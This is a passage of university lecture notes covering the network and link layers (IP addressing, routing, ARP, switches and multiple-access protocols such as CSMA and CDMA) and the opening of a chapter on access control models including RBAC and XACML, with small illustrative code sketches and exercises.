Figure 5.2: Network layer protocol is implemented in every router and host.
(Figure by Kurose and Ross)
In the Internet setting, the routers in the network core interconnect subnet-
works (also known as subnets) and they correspond to the gateways mentioned
in this definition.
5.2.1 Packetization
Network layer packetization refers to the encapsulation of transport layer seg-
ments into network layer datagrams by the sending host and the delivery of
these segments to the transport layer by the receiving host.
IP version 4 (IPv4)
The packet format of IPv4 datagrams is shown in Figure 5.4.
1 Note that sessions may still exist at higher layers, but the network core does not keep any such session state.
Fragmentation fields: The identification, flags and fragment offset fields, which
are used for fragmentation and reassembly (see the discussion of IPv4 fragmentation below).
Time To Live (TTL): The number of hops (links) that the datagram is still
allowed to take (value decremented at each router).
Protocol: Target layer 4 protocol for the payload of the datagram.
Header checksum: 16-bit checksum of the IP header as shown in Figure 5.5.
The payload is not included in the checksum calculation.
Source and destination IP addresses: IPv4 addresses are 32-bit network
layer identifiers of link interfaces of Internet hosts and routers. IPv4 ad-
dresses use the dotted decimal notation as shown in Figure 5.6.
Since routers have multiple link interfaces they have multiple IP addresses,
one for each interface. A significant portion of modern hosts also have
multiple link interfaces (e.g. one Ethernet, one WiFi) and multiple IP
addresses. Using 32 bits we can individually address 232 (roughly 4 billion)
IPv4 node interfaces, which is insufficient in our day.
Option: This part contains extra information fields that are mostly skipped.
We will not study those in this course.
IPv4 Fragmentation
The maximum size of the payload that can be encapsulated within a data link
layer frame is dependent on the specific link type. This size is referred to as
the Maximum Transmission Unit (MTU). For example, Ethernet has an MTU
of 1500 bytes while WiFi (wireless IEEE 802.11 protocol) has an MTU of 2400
bytes. Upon transmitting a datagram on the outgoing link, if the size of the
IP datagram is larger than the link MTU, the transmitter (i.e. a source host
or a router on the path) needs to divide the datagram into pieces that can
fit in a frame. This is called fragmentation. After fragmentation, individual
fragments travel to the destination host independently from each other and they
are reassembled into the full IP datagram only at the last destination host.
The second word (second line) of the IPv4 header contains fields that are
dedicated to this purpose as shown in Figure 5.4.
IP version 6 (IPv6)
IPv6 was developed as a result of the 32-bit IPv4 address space running out.
IPv6 addresses consist of 128 bits, which means that there are 2^128
IPv6 addresses. Just to put this amount in perspective, this is (way) more than
enough to give an IPv6 address to every grain of sand in the entire world.
The packet format of IPv6 is simpler than that of IPv4, which speeds up pro-
cessing at routers. The packet format is shown in Figure 5.9. The ‘option’ fields
have been removed from the basic header but this type of information (indicated
by the ‘Next header’ field) can now be part of the payload. In IPv6, routers
Figure 5.7: IPv4 datagram that is fragmented when moving towards link with
smaller MTU: Different fragments may take different paths and they are re-
assembled in the destination host. (Figure by Kurose and Ross)
do not deal with fragmentation. Sending hosts are required first to decide on a
datagram size using MTU discovery along the host-to-host path.
One of the goals of the original IPv6 design was to add security features
to IP. The Internet Protocol Security (IPsec) is a set of protocols for
authentication and encryption of IP packets. It was originally designed for
IPv6.
VER: IP version (v6).
PRI: Priority field used to classify packets.
Flow label: Labels packets belonging to the same flow with the same number.
Routers can use this information so that the packets take the same path
and maintain the same order.
Payload length: The payload length in number of bytes.
Next header: Specifies the transport layer protocol or the type of payload
extension headers that follow.
Figure 5.11: A network with three subnets. (Figure by Kurose and Ross)
Figure 5.13: Classful IPv4 addressing: Netid and Hostid parts of different classes.
The example shows the efficiency of assigning different class address spaces to
an organization with 2000 hosts. (Figure by Forouzan)
Assigning class B would result in a waste of more than 63K IPv4 addresses and
we can make class B assignments to at most 16368 such organizations. On the
other hand, assigning class C is not possible since class C gives only 256 distinct
addresses in each block. A workaround for this problem would be to assign
multiple class C blocks to the organization.
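With the CIDR notation introduced next, the size of an address block can be matched to the organization's needs. The following Python sketch uses the standard ipaddress module to compare a /16 (class B sized), a /21 and a /24 (class C sized) block; the prefix 200.23.16.0 is only an example value.

    import ipaddress

    for prefix in ("200.23.16.0/16", "200.23.16.0/21", "200.23.16.0/24"):
        net = ipaddress.ip_network(prefix, strict=False)
        usable = net.num_addresses - 2      # minus the network and broadcast addresses
        print(prefix, "->", usable, "usable host addresses")
    # 200.23.16.0/16 -> 65534, 200.23.16.0/21 -> 2046, 200.23.16.0/24 -> 254;
    # a /21 is a much better fit for an organization with 2000 hosts.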
Figure 5.14: CIDR notation: Subnet part and host part of an IPv4 address.
(Figure by Kurose and Ross)
Figure 5.15: DHCP: New host needs IP in the top right subnet. (Figure by
Kurose and Ross)
subnet.
4. The DHCP server assigns and sends the IP address in a “DHCP ack”
message.
Figure 5.16: The routing algorithm determines the forwarding tables of the
routers. (Figure by Kurose and Ross)
Figure 5.17 shows how a forwarding table of a router could look in principle,
with one entry per destination IP. However, such a forwarding table is impossi-
ble to maintain and use for a simple reason. Even with IPv4 addresses consisting
of 32 bits there would need to be around 4 billion entries in such a forwarding
table and every forwarding operation would require a look-up among these en-
tries. Furthermore, the amount of information exchange of the routing protocol
for maintaining forwarding tables of routers would cause a constant state of
congestion, rendering the Internet unusable for any other data communication.
Internet addressing is hierarchical. Hosts lease IP addresses from their sub-
nets. The network administrator of the subnet can acquire a block of IP ad-
dresses for the subnet from an Internet Service Provider (ISP). The ISP itself
Figure 5.17: Example (impractical) forwarding table with one entry per IP
address. (Figure by Kurose and Ross)
Figure 5.18: An ISP’s address space allocated evenly to eight customer organi-
zations. (Figure by Kurose and Ross)
Instead of employing the very inefficient scheme of one entry per destina-
tion IP (giant forwarding tables), routing in the Internet exploits the
addressing hierarchy of the Internet as a network of (sub)networks. Routers keep
forwarding table entries per address prefix and apply longest prefix matching to
select the outgoing link for a datagram, as shown in Figure 5.19.
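The following Python sketch illustrates the longest prefix match rule over a small forwarding table. The prefixes and link interface numbers are made-up example values.

    import ipaddress

    forwarding_table = [
        (ipaddress.ip_network("200.23.16.0/20"), 0),
        (ipaddress.ip_network("200.23.24.0/24"), 1),
        (ipaddress.ip_network("0.0.0.0/0"), 3),          # default route
    ]

    def lookup(destination):
        dest = ipaddress.ip_address(destination)
        matches = [(net, link) for net, link in forwarding_table if dest in net]
        return max(matches, key=lambda m: m[0].prefixlen)[1]   # longest prefix wins

    print(lookup("200.23.24.17"))   # 1: the /24 is more specific than the /20
    print(lookup("200.23.18.5"))    # 0: only the /20 (and the default) match
    print(lookup("8.8.8.8"))        # 3: only the default route matches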
Groups of subnetworks called autonomous systems (AS) have freedom in
how they deal with routing internally, and they advertise to other autonomous
systems the IP prefixes that are reachable through them as well as the associ-
ated cost (e.g. the number of subnets to the destination network). This is
exemplified in Figure 5.20.
Now consider the situation after ISPs-R-Us (an autonomous system) has
found a better route to Organization 1.3 Figure 5.21 shows the new route
advertisements in this case.
3 For example, it may be that Organization 1’s link connection to Fly-By-Night-ISP is
somehow disconnected.
Figure 5.19: Example forwarding table with longest prefix match. (Figure by
Kurose and Ross)
Figure 5.21: New routing advertisements after ISPs-R-Us has found a better
route to Organization 1. (Figure by Kurose and Ross)
Internally, each autonomous system can run its own (intra-AS) routing pro-
tocol for reaching hosts inside the autonomous system. On the other hand,
the (inter-AS) routing protocol at autonomous system boundaries (at border
gateway routers) towards other autonomous systems must be standardized.
Notice: The lecture slides contain sufficient explanations that are needed
for the Internet’s routing protocols, which are not repeated in this document
(at least not this year: we are doing our best to produce text and enrich the
lecture notes every year). It may be a good time now to switch to lecture slides,
study the relevant slides and come back. Note that you are responsible for both
the slides and these notes in the exam.
Figure 5.22: Virtual circuit: all packets taking the same path through the same
routers from the source host till the destination host. (Figure by Kurose and
Ross)
address is processed by each router on the path. On the contrary, in virtual cir-
cuits the virtual circuit identifier can be a different number on each link. Each
router on the host-to-host path maintains this information, i.e. the virtual cir-
cuit numbers in its incoming and outgoing links for each virtual circuit, as part
of the connection state.
Similar to physical circuit switching, virtual circuit sessions (or calls) require
call setup, call maintenance and call termination procedures. During call setup
the caller initiates the call and the callee accepts the call by sending a reply as
shown in Figure 5.23. After this point, the connection is established and data
can start flowing in the virtual circuit.
Figure 5.23: Virtual circuit call setup. (Figure by Kurose and Ross)
5.6 Summary
Network layer services are essential for host-to-host communication in computer
networks. An important service is ‘hierarchical’ network layer addressing, which
reduces routing complexity and makes it possible to deal with billions of IP ad-
dresses. Autonomous systems consisting of non-overlapping sets of subnets have
different strategies for handling internal routing (intra-AS routing). In this way,
each autonomous system can implement its own internal routing policies and
optimize routing performance considering its own network topology. On the
other hand, a common routing protocol is needed at the borders of autonomous
systems for interoperability. The Border Gateway Protocol is the global stan-
dard of the Internet for routing packets across autonomous systems (inter-AS
routing).
5.6.1 Literature
Suggested reading
• Chapter 4 of the book Computer Networking: A Top-Down Approach by
Kurose and Ross [20, Chapter 4].
Suppose AS3 and AS2 are running OSPF for their intra-AS routing proto-
col, and AS1 and AS4 are running RIP for their intra-AS routing protocol.
Suppose eBGP and iBGP are used for the inter-AS routing protocol.
• What are the roles and working principles of hubs and switches?
Figure 6.1: Issues addressed by the data link layer. (Figure by Forouzan)
The second type is a broadcast link where the network interfaces of many
nodes (multiple senders, multiple receivers) are connected to a single shared
broadcast medium (broadcast channel). There are two famous link topologies
of a broadcast link: bus topology and star topology.
Bus Topology: In the past, the bus topology shown in Figure 6.2 was very
commonly used in local area networks (LAN). In this topology, the data
transmitted from individual nodes can ‘collide’ with each other since each
node ‘hears’ every transmission in broadcast links. This is why a bus
topology link is said to have a single collision domain. This topology
is nowadays more often used in networks of embedded devices and in the
automotive industry (e.g. a vehicle’s steering system communicating with
the front wheels over the vehicle bus).
Star Topology: Today, the star topology shown in Figure 6.3 is very popular
as the link layer topology in computer networks. In the star topology,
there is an active entity sitting in the center, i.e. a hub or a switch, which
has a single hop network interface connection to each node. In case of
using a switch, simultaneous transmissions of different nodes are isolated
from each other by the switch via buffering. In case of using a hub in
the center, the star topology also has a single collision domain as hubs
are nothing but dumb bit repeaters. We will discuss switches and hubs in
more detail in Section 6.2, after we have introduced link layer addressing.
Remember the illustration of the comparison between the data delivery ser-
vices provided by the different protocol layers (depicted again in Figure 6.4 for
convenience). In the end-to-end path of a datagram between the source host
and the destination host, there can be various links of different types and with
different link layer protocols. As a result, the quality of service and even the
service types differ per link. For example, some links may be reliable while
others are not. For reliable one hop data delivery, the link layer protocol needs
to deal with duplicate frame receptions and data errors, while making sure that
the data frames are delivered to the receiver in the same order in which they are
supplied by the sender. Similarly, some links may provide a connection-oriented
service while others provide connection-less service.
Figure 6.5: Each network interface has a unique link layer address. (Figure by
Kurose and Ross)
Link layer addresses are considered to be static. For example, your laptop has the
same MAC address whether you are connected to your home network or to the
university network1 . In practice, the link layer address of a network interface
card can be changed in software.
Consider the delivery of a packet in the last hop before the destination host
with IP address 137.196.7.78 as depicted by Figure 6.6. A service that maps
the destination address 137.196.7.78 to the MAC address 1A-2F-BB-76-09-AD
is needed2 . In the Internet, this service (i.e. address resolution for routing in
the same subnet) is provided by the Address Resolution Protocol (ARP),
1 Note that this is different from IP addresses, where you have a different IP address in each
subnet. The first 24 bits of a MAC address are assigned to a manufacturer by IEEE. The
remaining 24 bits are assigned by the manufacturer to its individual products’ network interface cards.
2 Note that every IP address is mapped to a (unique) MAC address.
Figure 6.6: On a given link, every IP address maps to a MAC address. ARP
does the translation from IP addresses to MAC addresses. (Figure by Kurose
and Ross)
which is described in Figure 6.7. Every node maintains an ARP table, which
contains mappings from some of the IP addresses on the same subnet to their
MAC addresses, together with a TTL (Time To Live) value. The TTL determines
the time until the mapping expires (i.e. is taken out of the ARP table) and is
typically set to 20 minutes.
Note that the creation of ARP tables does not require any manual support
from a network administrator. The ARP table of a node is created fully auto-
matically after joining a subnet.
6.3.1 Hub
A hub is simply a repeater (indeed a physical layer device), whose task is to
forward and repeat bits coming into one of its link interfaces to all other links
connected to its remaining link interfaces. A hub works on bits; it does not
(necessarily) contain software and it does not examine frame headers. A hub
does not buffer any frames and, therefore, it does not decouple transmissions of
different senders. That means collisions can still occur in a star topology with
a hub in the center.
6.3.2 Switch
As opposed to hubs, a switch3 operates on link layer frames, i.e. it examines the
headers of incoming frames. Therefore, its operation is much more complex
than that of a hub. Switches are very often used in Ethernet links. A switch
buffers the incoming frame, and depending on the destination MAC address it
selectively forwards the frame on one or more of its link interfaces (i.e. store-
and-forward behavior).
A switch maintains a switch table in order to keep track of which MAC
addresses are reachable on each of its link interfaces. Every time the switch
receives a frame on one of its link interfaces the switch adds an entry to its
switch table mapping the source (link layer) address of the incoming frame
to the corresponding link interface4 . The switch operation is summarized in
Figure 6.8.
3 The main difference of a router from a layer 3 switch is that a router’s operation is in software and
more dynamic, while a layer 3 switch’s operation is in hardware and faster as a result. Layer
3 switches are beyond our scope.
4 That is unless the entry already exists. Similar to the ARP table, the switch also maintains
a TTL duration with each entry, at the end of which the corresponding entry is removed from
the switch table.
Switches can be interconnected as shown in Figure 6.9 and the switch opera-
tion depicted in Figure 6.8 and the build-up of switch tables remain exactly the
same. See how the switch tables are built in this case in the video recording of
the lecture (slides contain an example with animations).
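The build-up of the switch table and the forwarding decision can be sketched as follows in Python. The MAC addresses and interface numbers are invented, and the TTL handling of table entries is omitted.

    switch_table = {}   # MAC address -> interface on which that address was last seen

    def on_frame(src_mac, dst_mac, in_interface, all_interfaces):
        switch_table[src_mac] = in_interface             # learn where the sender lives
        if dst_mac in switch_table:
            out = switch_table[dst_mac]
            return [] if out == in_interface else [out]  # drop or selectively forward
        return [i for i in all_interfaces if i != in_interface]   # unknown: flood

    ports = [1, 2, 3, 4]
    print(on_frame("AA-AA-AA-AA-AA-01", "BB-BB-BB-BB-BB-02", 1, ports))  # flood: [2, 3, 4]
    print(on_frame("BB-BB-BB-BB-BB-02", "AA-AA-AA-AA-AA-01", 2, ports))  # learned: [1]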
Two simple error detection schemes are single bit parity and two-dimensional
bit parity. Single bit parity checking can detect all single bit errors. The parity
bit aims to make the total number of 1’s in the bit pattern even (even bit parity
check) or odd (odd bit parity check). Two-dimensional bit parity checking
structures the data into rows and columns and computes a parity bit for each
row and each column as in single bit parity. Two-dimensional bit parity checking
can detect and correct all single bit errors. The ability to correct comes from the
fact that a single bit error is detected both in the row parity and in the column
parity of the erroneous bit, so the only thing that is needed for correction is to
flip that bit back to its original state.
Figure 6.11: CRC bit pattern computation and an example. (Figure by Kurose
and Ross)
Now imagine listening to two lecturers at the same time in the same class-
room. That would obviously be a disaster since neither of the two lectures would
be intelligible to the audience. As a result, students would learn nothing and
very valuable resources, namely, the classroom time, the students’ time and en-
ergy, as well as the lecturers’ time and energy would be wasted. Clearly, media
access control is crucial.
Similarly, frame collisions on a link waste channel and node resources and
ideally they should be avoided altogether. In any case, access to shared
media must be regulated in order to prevent frame collisions from consuming
the majority of the transmission time on the medium. The protocols
that regulate access to shared media are called multiple-access protocols. In
the ideal situation, a multiple access protocol should divide the channel capacity
entirely (no idle capacity) and equally among senders.
There are three classes of multiple-access protocols in the literature:
TDMA: Time is divided into periodic rounds. At each round a sender has the
right to access the link only inside its allocated fixed-length time slot. The
time slot length is typically chosen according to the transmission time of
the maximum size packet (MTU). If a sender does not use its time slot,
the slot is wasted. An example with 6 senders is shown in Figure 6.13.
5 Two signals f(t) and g(t) are mutually orthogonal to each other on the interval [0, T] if
∫_0^T f(t)g(t) dt = 0.
FDMA: Fixed pieces of the total channel bandwidth are allocated to individual
senders. Whenever a sender does not send anything its frequency band
capacity is wasted. An example with 6 senders is shown in Figure 6.14.
CDMA: Each sender is assigned one of a set of mutually orthogonal5 codes, and
each sender uses its code to encode its bit pattern. Multiple senders can transmit
their bit patterns at the same time using the full channel bandwidth. The sum
of the signals of the simultaneous senders, s(t) = c1(t) + c2(t) + ... + cN(t),
can be decoded at the receiving side by projecting the sum onto the individual
codes (a small numeric sketch of this decoding is given after the figure captions
below). For example, projecting s(t) onto c1(t) over one bit interval of length
T seconds amounts to computing

    ∫_T s(t) · c1(t) dt = ∫_T (c1(t) + c2(t) + ... + cN(t)) · c1(t) dt
                        = ∫_T c1(t) · c1(t) dt + ... + ∫_T cN(t) · c1(t) dt
                        = ∫_T c1(t) · c1(t) dt,

where the last step uses that all cross terms ∫_T ci(t) · c1(t) dt with i ≠ 1
vanish by orthogonality.
Figure 6.15: Four orthogonal codes, each of which can be used by a different
sender. (Figure by Wikipedia)
Figure 6.16: CDMA encoding with two senders and two codes. The bottom
signal is s(t). Note that for the first sender, the results of the computation
∫_T s(t) · c1(t) dt in the first, second and third bit intervals are 1, -1 and -1 Volts,
corresponding to bits 1, 0 and 0 respectively. For the second sender, the results
of the computation ∫_T s(t) · c2(t) dt in the first, second and third bit intervals
are 1, -1 and 1 Volts, corresponding to bits 1, 0 and 1 respectively.
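The decoding computation above can be made concrete with a discrete Python sketch: each sender multiplies its data bit (+1 or -1) by its chip code, the channel adds the signals, and the receiver recovers a sender's bit by correlating the sum with that sender's orthogonal code. The codes below are example Walsh codes of length 4.

    c1 = [+1, +1, +1, +1]           # two mutually orthogonal example codes
    c2 = [+1, -1, +1, -1]

    def encode(bit, code):          # bit is +1 (for 1) or -1 (for 0)
        return [bit * chip for chip in code]

    def decode(signal, code):       # discrete analogue of (1/T) * integral of s(t)·c(t) dt
        return sum(s * c for s, c in zip(signal, code)) / len(code)

    s = [a + b for a, b in zip(encode(+1, c1), encode(-1, c2))]   # summed channel signal
    print(decode(s, c1))   #  1.0 -> sender 1 sent bit 1
    print(decode(s, c2))   # -1.0 -> sender 2 sent bit 0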
ALOHA: The name was given by its designers at the University of Hawaii (a
word used for greeting in Hawaiian). In ALOHA, a sender that has data
to send immediately transmits a full link layer frame containing (part of)
the data. In case there is a collision (packet loss), the sender retransmits
the frame with the probability p after it has completely transmitted the
collided frame (waste). On the plus side, this is a decentralized protocol,
i.e. there is no central intelligence that decides who can transmit when.
However, the efficiency (probability of a successful transmission attempt)
of ALOHA is very low, leading to a lot of retransmissions and poor perfor-
mance. ALOHA has time slotted (which needs synchronization among senders)
and unslotted versions.
CSMA: Since frequent collisions kill efficiency as in the case of ALOHA, it was
necessary to develop a protocol that aims to prevent collisions. CSMA is
such a protocol; its principle is ‘do not interrupt others while they are
transmitting’. The CSMA sender listens to the channel before transmitting
anything (carrier sensing). If there is a currently ongoing transmission, the
sender defers its own transmission. The operation of the CSMA sender is given
in Figure 6.17.
Note that collisions can still occur with CSMA due to propagation delays
as shown in Figure 6.18. A variant of CSMA, CSMA with Collision
Detection (CSMA/CD) tries to detect collisions and quickly stops the
sender’s transmission upon collision detection (so that fewer resources are wasted). The
sender can detect a collision, for example, if it is receiving another signal
while sending its own. There are many ways to detect collisions. A popular
MAC protocol that employs CSMA/CD is the Ethernet protocol.
Another variant of CSMA, CSMA with Collision Avoidance (CS-
MA/CA) does not employ collision detection. CSMA/CA proves to be
useful especially in wireless networks where collision detection is very dif-
ficult. There are two difficulties with collision detection in wireless. The
first difficulty is that the power of the received signal is usually very weak
in comparison to the power of the transmitted signal6 . Secondly, the so
6 This is as measured by the transmitter. The weakness of the received signal comes from the strong attenuation of wireless signals along the channel.
called hidden terminal problem depicted in Figure 6.19 can cause packet
collisions that are impossible to detect by the transmitters.
Figure 6.19: The hidden terminal problem. (Figure by Kurose and Ross)
If the channel is sensed busy, the CSMA/CA sender waits for a randomly
chosen amount of time before it tries again, which is called a ‘random
backoff’. When the backoff counter hits zero (i.e. the randomly chosen
backoff period expires), the sender ‘senses’ the channel again and transmits
its packet if the channel is not busy. If the channel is still busy, a new random
backoff duration is chosen (from a larger interval) and the sender waits again.
This is repeated until the receiver’s acknowledgement is received for the frame.
The CSMA/CA operation of a WiFi link (IEEE 802.11 protocol) is shown
in Figure 6.20.
Additionally, CSMA/CA may allow (wireless) senders to reserve the
channel (instead of random access) with the purpose of eliminating colli-
sions. For this, the CSMA/CA sender transmits a small Request-To-Send
(RTS) message to the wireless access point, which in return broadcasts a
Clear-To-Send (CTS) message granting the sender exclusive access to the
channel for a short period.
In controlled-access (taking turns) protocols, the time allocated to a sender (when it is its turn) can be increased if the sender has more data to send than others. While
idling of (rather long) time slots is a problem of TDMA, it is not a problem for
controlled-access. We will mention two taking turns protocols: i) polling, and
ii) token passing.
Polling: In polling, a central node invites the other nodes to transmit one after
the other. The polling messages themselves introduce channel overhead and
latency, and the central node is a single point of failure.
Token Passing: In token passing, a control token message is passed from node
to node in a logical (token) ring. The node that currently has the token
can transmit and pass the token to the next node after it’s done. Similar to
polling, the necessity to circulate the token message gives channel overhead
and latency. This time the token message itself is the single point of failure
since nodes will not transmit a token message if they have not received
one (e.g. if the token packet is lost).
6.6 Summary
The link layer is responsible for transferring a packet from one node to an adjacent
node over a single link. Media access protocols govern which node on a given link
is allowed to transmit at any given time. In doing so, these protocols should
aim to utilize the channel optimally and fairly. We have seen three classes
of media access protocols: i) channel partitioning (channelization) protocols,
ii) random access protocols, and iii) controlled access protocols (taking turns).
Wireless links bring unique challenges. The reader should refer to the lecture
slides and the video recordings of the link layer lectures for a full coverage of
MAC protocols and wireless link challenges. The lecture notes are focused on
the fundamentals rather than the specific protocols. Note that TCP interprets
transmission timeouts as indicators of congestion and decreases its congestion
window size. Although this assumption is acceptable when the links are unlikely
to lose packets, when we consider very lossy wireless links on the host-to-host
path we can immediately argue that a lot of timeouts can occur due to losses
on a wireless link. For example, you may try to take your laptop to the kitchen
and download a file over WiFi while the microwave oven is on. You will see that
your wireless connection suffers considerably since microwave ovens operate
in roughly the same frequency range as your WiFi access point. The massive
interference from the microwave oven will cause packet losses and timeouts, and
these losses have nothing to do with packet congestion in the network core.
6.6.1 Literature
Suggested reading
2. If all the links on the end-to-end path from the source host to the des-
tination host are reliable, would that be (by itself, without using TCP)
sufficient for the reliability needs of a file transfer application? Why?
3. Assume that the sender and the receiver on a link agree on a 4-bit gener-
ator pattern, G, which is equal to 1001. The sender wants to send to the
receiver 6 bits of data, D, which is equal to 101110. Find the CRC bits R
to be appended to D. Show your work.
4. Suppose nodes A and B are on the same 10 Mbps broadcast channel, and
the propagation delay between the two nodes is 325 bit times. Suppose
CSMA/CD and Ethernet packets are used for this broadcast channel (see
slides). Suppose node A begins transmitting a frame and, before it fin-
ishes, node B begins transmitting a frame. Can A finish transmitting
before it detects that B has transmitted? Why or why not? If the answer
is yes, then A incorrectly believes that its frame was successfully trans-
mitted without a collision. Hint: Suppose at time t = 0 bits, A begins
transmitting a frame. In the worst case, A transmits a minimum-sized
frame of 512 + 64 bit times. That means A would finish transmitting the
frame at t = 512 + 64 bit times. Thus, the answer is no, if B’s signal
reaches A before bit time t = 512 + 64 bits. In the worst case, when does
B’s signal reach A?
5. Consider the network depicted in the figure below. The IP addresses and
MAC addresses of individual interfaces are as denoted in the figure.
Suppose that the sender host with the IP address 111.111.111.111 wants to
send an IP datagram to the receiver host with IP address 222.222.222.222.
Answer the following questions:
(a) How many subnets are there in this network? Which IP addresses
belong to which subnet?
Chapter 7
Authentication and Authorization
Applications interacting with end users access resources that represent signifi-
cant value (e.g. entering a building, reading or modifying a data base, perform-
ing computations) either directly or over a network. Many security goals of a
network are thus related to access and proper use of these resources. As defined
in Chapter 1, a security policy specifies, among other things, which subjects are
allowed to perform which actions on which resources.
Enforcing the desired access control policy requires checking that an at-
tempted action on a resource is allowed for the user performing the action.
Thus we have to perform authentication (check the identity of the user, or
at least establish some properties of the user such as ‘the user is a student’)
and authorization (check the actions by the user on the resource against the
policy).
This chapter addresses the following questions:
Figure 7.1: An access control matrix with five users and two resources.
lecturer maintains an online gradelist that the students can view and an online
essay submission program that the students can run’.
Recall from Chapter 1 that the meaning of a security policy is given by the
interpretation in a security model. An obvious choice for the structure of the
mathematical security model is a relation on subjects, resources and rights.
Our goal is to define access control policies which capture the meaning of
the intended high level policy by somehow specifying who (subject) is trusted
with which resource (object) to do what (allowed actions).
Figure 7.2: An RBAC policy with two roles, two resources and five users.
the class change we need to update the matrix. If Alice leaves the class we may
need to revoke her rights but how do we know that Alice had the read right
(only) because she was a student in the class?
The matrix for an entire system/network is difficult to manage. A centrally
stored matrix would create a huge bottleneck for the system/network as any
action on any resource would need to be checked at this central point. Instead
we need to distribute the storage of the matrix. The use of Access Control
Lists is one way of doing this. An AC list is basically a column from an AC
matrix, stating all the rights that different subjects have on a single resource.
As such it has a natural place to store it, i.e. together with the resource. Of
course a problem is if rights change (e.g. a student is added or removed from
the class) all relevant AC lists have to be found and updated. While this gives
a viable implementation, the maintainability only gets worse.
Finally, to use his read right Bob will have to identify himself to the system.
This should not be needed; Bob should only have to prove that he is a student
and not reveal who he is. Below we look at different mechanisms to address
these issues with the access control matrix.
Role Based Access Control (RBAC) stays closer to the intention of the high
level policy. It retains the notions of ‘Lecturer’ and ‘Student’ and the notion
that having one of these roles is why users obtain certain permissions.
By retaining more of the intention of the high level policy RBAC helps
improve maintainability. If Alice leaves the class all we have to change now is
the role-subject table. We do not need to manually change any rights. When
Alice tries to read Gradelist 2IC60 the system will compute her rights which, as
she is no longer a student, do not include reading this gradelist. Thus access will
be denied. If the high level policy changes and students are no longer allowed
to submit essays (for example because the deadline has passed) only this entry
in the role-resource table needs to be changed.
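The RBAC idea can be sketched with two small tables in Python; the table contents below are invented for illustration, in the spirit of Figure 7.2. Note that removing Alice from the Student role revokes her derived rights without touching any resource-specific entry.

    user_roles = {"Alice": {"Student"}, "Bob": {"Student"}, "Tanir": {"Lecturer"}}
    role_permissions = {
        "Student":  {("Gradelist 2IC60", "read"), ("Essay submission", "run")},
        "Lecturer": {("Gradelist 2IC60", "read"), ("Gradelist 2IC60", "write")},
    }

    def allowed(user, resource, action):
        return any((resource, action) in role_permissions.get(role, set())
                   for role in user_roles.get(user, set()))

    print(allowed("Alice", "Gradelist 2IC60", "read"))   # True: derived from the Student role
    user_roles["Alice"].discard("Student")               # Alice leaves the class
    print(allowed("Alice", "Gradelist 2IC60", "read"))   # False: no role grants the right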
Subjects can be described by attributes (e.g. ‘has role student’), and resources
and actions can be treated the same; instead of allowing action ‘read’ we could
use attributes as in ‘allow any action marked as viewing’ to allow actions read,
display, print, etc. Finally, environmental conditions such as ‘during working
hours’ and ‘before the deadline’ can also be captured with attributes. By
assigning rights to combinations of such attributes, attribute based access
control (ABAC) provides a very powerful language for expressing access control
policies.
The eXtensible Access Control Markup Language (XACML) standard de-
fines a popular ABAC language and a system/network architecture for enforce-
ment. XACML defines several components involved in the AC enforcement.
Figure 7.4 gives a (simplified) view of these components and their interaction.
The Policy Enforcement Point (PEP) is responsible for intercepting requests
and ensuring that users only get access to their allowed resources. The PEP
uses a Policy Decision Point (PDP) to determine which requests are allowed
(should be granted). The PEP gathers information about the subject and the
resource and the context in which the request is being issued (the environment)
from a Policy Information Point (PIP) and incorporates this in a request sent
to the PDP. The PDP tests the request against the set of policies that it has in
its policy store to make a decision (access granted or access denied). The PDP
can also return values indicating it is unable to make a decision: indeterminate
(some error occurred) or not-applicable (this PDP has no policies related to the
request).
A policy set contains, in addition to a list of policies1, a combination algo-
rithm that is used to combine the decisions of the different policies in the set.
Examples are ‘first applicable’ (the first policy to return a decision gets selected),
‘DENY overrides’ (if a single policy denies the request, this is the final decision,
even if other policies allow the request) and ‘PERMIT overrides’ (a single
permit decision overrides any other decisions).
A policy has a target determining which requests it is (or at least might
be) applicable to. The rules of the policy will be evaluated for those requests.
The rules check conditions (e.g. the issuer of the request is a student) to either
PERMIT or DENY a request. The policy also has an algorithm to combine the decisions of its rules.
1A policy list would be a better name than a policy set since the order may indeed matter.
XACML policies, requests and responses are written in XML format. Though XML
(and thus XACML) format is human readable, it is not very human friendly.
Interpreting a policy can be hindered by the large amount of textual overhead.
An example XACML request and the corresponding response look as follows:

<Request>
  <Subject>
    <Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:subject:subject-id"
      DataType="urn:oasis:names:tc:xacml:1.0:data-type:rfc822Name">
      <AttributeValue>[email protected]</AttributeValue>
    </Attribute>
    <Attribute AttributeId="group"
      DataType="http://www.w3.org/2001/XMLSchema#string"
      Issuer="[email protected]">
      <AttributeValue>developers</AttributeValue>
    </Attribute>
  </Subject>
  <Resource>
    <Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:resource:resource-id"
      DataType="http://www.w3.org/2001/XMLSchema#anyURI">
      <AttributeValue>http://server.example.com/code/docs/developer-guide.html</AttributeValue>
    </Attribute>
  </Resource>
  <Action>
    <Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:action:action-id"
      DataType="http://www.w3.org/2001/XMLSchema#string">
      <AttributeValue>read</AttributeValue>
    </Attribute>
  </Action>
</Request>

<Response>
  <Result>
    <Decision>Permit</Decision>
    <Status>
      <StatusCode Value="urn:oasis:names:tc:xacml:1.0:status:ok"/>
    </Status>
  </Result>
</Response>
The request indicates who (subject) wants to do what (action; e.g. read) with which resource (e.g. the developer guide).
It may also contain information about the environment; e.g. the request was
made from within the same office (or from within the same subnet) and during
working hours. The response contains the decision and a status code.
The XACML system is very general and by using selected sets of attributes
and formats it can model or be used in combination with other identification
and access control systems and standards. Note that XACML is attribute based
so we do not always need the identity of the user (requester, also called subject
in XACML terms). However, as the identity is just another attribute (named
‘urn:...:subject-id’) we can use it in the policy. Example: give read access to
anyone with a role attribute ‘student’, an identity attribute ‘Jerry’ or an identity
attribute ‘Tanir’.
If Alice trusts Bob (and has his public key) then Alice can also trust statements
that Bob signs. The level of trust in the signed statement by Bob, i.e. his
certificate, can depend on how sure Alice is that she has Bob’s key, how strong
the signature scheme is, the level of trust in Bob and the statement that Bob is
making. For example, Bob may be an expert on baking so we will trust a bread
recipe but not a medical prescription. One may even consider the content rather
than the type of statement. For example, trust if the recipe looks ‘normal’ and
do not trust if the recipe has suspicious ingredients (e.g. asbestos).3
When Alice is not sure that the public key p is really the public key of Bob,
she cannot trust signed statements that are checked using p. When Alice and
Bob meet in person they can share their public keys. If Alice and Bob can
only communicate over an insecure channel (e.g. the Internet) and Bob sends his
public key, then an attacker Mallory may change it along the way. Thus Alice
needs some way of checking that the key is correct. If Alice trusts Charlie who
already knows the key of Bob then Charlie could issue a certificate stating ‘the
